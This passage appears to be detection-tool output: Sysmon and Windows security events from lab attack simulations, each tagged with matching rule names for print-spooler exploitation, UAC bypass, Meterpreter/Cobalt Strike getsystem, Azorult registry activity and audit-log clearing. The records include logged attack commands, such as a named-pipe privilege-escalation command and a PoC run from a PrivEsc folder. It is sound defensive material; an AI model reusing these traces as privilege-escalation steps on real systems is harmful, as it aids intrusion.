13:04:27.549"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342296,"Execution":{"#attributes":{"ProcessID":3296,"ThreadID":4484}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-12T13:04:27.562856Z"}},"Version":2}}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.549","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\TTYRES.DLL","UtcTime":"2020-08-12 13:04:27.549"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342297,"Execution":{"#attributes":{"ProcessID":3296,"ThreadID":4484}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-12T13:04:27.562922Z"}},"Version":2}}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.549","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\TTY.INI","UtcTime":"2020-08-12 13:04:27.549"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342298,"Execution":{"#attributes":{"ProcessID":3296,"ThreadID":4484}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-12T13:04:27.562970Z"}},"Version":2}}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.549","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\TTY.DLL","UtcTime":"2020-08-12 13:04:27.549"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342299,"Execution":{"#attributes":{"ProcessID":3296,"ThreadID":4484}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-12T13:04:27.563018Z"}},"Version":2}}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.549","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\TTYUI.DLL","UtcTime":"2020-08-12 13:04:27.549"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342300,"Execution":{"#attributes":{"ProcessID":3296,"ThreadID":4484}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-12T13:04:27.563107Z"}},"Version":2}}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.549","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\TTYUI.HLP","UtcTime":"2020-08-12 13:04:27.549"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342301,"Execution":{"#attributes":{"ProcessID":3296,"ThreadID":4484}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-12T13:04:27.563213Z"}},"Version":2}}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.549","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\UNIRES.DLL","UtcTime":"2020-08-12 13:04:27.549"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342302,"Execution":{"#attributes":{"ProcessID":3296,"ThreadID":4484}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-12T13:04:27.563647Z"}},"Version":2}}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.563","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\STDNAMES.GPD","UtcTime":"2020-08-12 13:04:27.563"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342303,"Execution":{"#attributes":{"ProcessID":3296,"ThreadID":4484}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-12T13:04:27.602658Z"}},"Version":2}}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.563","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\STDDTYPE.GDL","UtcTime":"2020-08-12 13:04:27.563"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342304,"Execution":{"#attributes":{"ProcessID":3296,"ThreadID":4484}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-12T13:04:27.602986Z"}},"Version":2}}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.563","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\STDSCHEM.GDL","UtcTime":"2020-08-12 13:04:27.563"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342305,"Execution":{"#attributes":{"ProcessID":3296,"ThreadID":4484}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-12T13:04:27.603171Z"}},"Version":2}}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.563","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\STDSCHMX.GDL","UtcTime":"2020-08-12 13:04:27.563"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342306,"Execution":{"#attributes":{"ProcessID":3296,"ThreadID":4484}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-12T13:04:27.603794Z"}},"Version":2}}}},{"detection":["Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.563","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\Old\\1","UtcTime":"2020-08-12 13:04:27.563"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342307,"Execution":{"#attributes":{"ProcessID":3296,"ThreadID":4484}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-12T13:04:27.622837Z"}},"Version":2}}}},{"detection":["Suspicious Copy From or To System32"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\Windows\\system32\\cmd.exe /c copy Report.wer C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\a_b_c_d_e > nul 2>&1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\Public\\tools\\PrivEsc\\cve-2020-1337-poc-master\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.592 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-E911-5F33-0000-0020241C0400","LogonId":"0x41c24","OriginalFileName":"Cmd.Exe","ParentCommandLine":"WerTrigger.exe","ParentImage":"C:\\Users\\Public\\tools\\PrivEsc\\cve-2020-1337-poc-master\\WerTrigger.exe","ParentProcessGuid":"747F3D96-E938-5F33-0000-00109CA00E00","ParentProcessId":7820,"ProcessGuid":"747F3D96-E93A-5F33-0000-001014B30E00","ProcessId":7868,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-08-12 13:06:02.548"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":342413,"Execution":{"#attributes":{"ProcessID":3344,"ThreadID":4176}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-12T13:06:02.552084Z"}},"Version":5}}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"whoami","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"whoami - displays logged on user information","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-E909-5F33-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"whoami.exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-E93C-5F33-0000-0010A6F00E00","ParentProcessId":8032,"ProcessGuid":"747F3D96-E940-5F33-0000-001039310F00","ProcessId":7460,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-08-12 13:06:08.141"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":342417,"Execution":{"#attributes":{"ProcessID":3344,"ThreadID":4176}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-12T13:06:08.143703Z"}},"Version":5}}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\whoami.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"whoami - displays logged on user information","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-6ABB-5EAD-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"whoami.exe","ParentCommandLine":"powershell.exe","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-B592-5EAD-0000-0010D4CDC200","ParentProcessId":1428,"ProcessGuid":"747F3D96-B595-5EAD-0000-00106BFDC200","ProcessId":6004,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-05-02 18:01:57.417"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":110435,"Execution":{"#attributes":{"ProcessID":3068,"ThreadID":2232}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-05-02T18:01:57.418442Z"}},"Version":5}}}},{"detection":["MMC Spawning Windows Shell"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\windows\\system32\\cmd.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.18362.449 (WinBuild.160101.0800)","Hashes":"SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"00247C92-8C36-5F75-0000-002034E39103","LogonId":"0x391e334","OriginalFileName":"Cmd.Exe","ParentCommandLine":"\"C:\\Windows\\System32\\mmc.exe\" WF.msc","ParentImage":"C:\\Windows\\System32\\mmc.exe","ParentProcessGuid":"00247C92-9E03-5F7B-0000-0010A645272C","ParentProcessId":20228,"ProcessGuid":"00247C92-9E04-5F7B-0000-0010CF98272C","ProcessId":12876,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":2,"User":"LAPTOP-JU4M3I0E\\bouss","UtcTime":"2020-10-05 22:28:20.529"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":1,"EventRecordID":2164913,"Execution":{"#attributes":{"ProcessID":5424,"ThreadID":6708}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-05T22:28:20.530062Z"}},"Version":5}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"\"C:\\Windows\\system32\\cmd.exe\"","EventType":"SetValue","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-5808-5D45-0000-00106CDC3E00","ProcessId":924,"RuleName":"PrivEsc - UAC bypass UACME-34","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Environment\\windir","UtcTime":"2019-08-03 09:46:48.692"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":5132,"Execution":{"#attributes":{"ProcessID":2780,"ThreadID":3676}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-08-03T09:46:48.726304Z"}},"Version":2}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000003)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"365ABB72-F6A1-5CC7-0000-001004550000","ProcessId":468,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\msdhch\\Start","UtcTime":"2019-04-30 07:46:15.168"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":8573,"Execution":{"#attributes":{"ProcessID":1876,"ThreadID":1444}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-30T07:46:15.199614Z"}},"Version":2}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"cmd.exe /c echo msdhch > \\\\.\\pipe\\msdhch","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"365ABB72-F6A1-5CC7-0000-001004550000","ProcessId":468,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\msdhch\\ImagePath","UtcTime":"2019-04-30 07:46:15.168"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":8574,"Execution":{"#attributes":{"ProcessID":1876,"ThreadID":1444}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-30T07:46:15.199614Z"}},"Version":2}}}},{"detection":["Meterpreter or Cobalt Strike Getsystem Service Start"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd.exe /c echo msdhch > \\\\.\\pipe\\msdhch","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"System","LogonGuid":"365ABB72-F6A1-5CC7-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"C:\\Windows\\system32\\services.exe","ParentImage":"C:\\Windows\\System32\\services.exe","ParentProcessGuid":"365ABB72-F6A1-5CC7-0000-001004550000","ParentProcessId":468,"ProcessGuid":"365ABB72-FD47-5CC7-0000-00106AF61D00","ProcessId":4088,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-04-30 07:46:15.183"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":8575,"Execution":{"#attributes":{"ProcessID":1876,"ThreadID":1444}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-30T07:46:15.215239Z"}},"Version":5}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000004)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"365ABB72-F6A1-5CC7-0000-001004550000","ProcessId":468,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\msdhch\\Start","UtcTime":"2019-04-30 07:46:15.230"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":8576,"Execution":{"#attributes":{"ProcessID":1876,"ThreadID":1444}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-30T07:46:15.246489Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-08-03 12:32:34.721","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-7EE2-5D45-0000-00104E852801","ProcessId":5284,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\MSCOREE.DLL","UtcTime":"2019-08-03 12:32:34.721"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":5494,"Execution":{"#attributes":{"ProcessID":2780,"ThreadID":3676}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-08-03T12:32:34.875974Z"}},"Version":2}}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"System":{"Channel":"Security","Computer":"IEWIN7","Correlation":null,"EventID":1102,"EventRecordID":18195,"Execution":{"#attributes":{"ProcessID":780,"ThreadID":3812}},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"}},"Security":null,"Task":104,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-11T17:10:06.342445Z"}},"Version":0},"UserData":{"LogFileCleared":{"#attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog","xmlns:auto-ns3":"http://schemas.microsoft.com/win/2004/08/events"},"SubjectDomainName":"IEWIN7","SubjectLogonId":"0x1371b","SubjectUserName":"IEUser","SubjectUserSid":"S-1-5-21-3583694148-1414552638-2922671848-1000"}}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-05-09 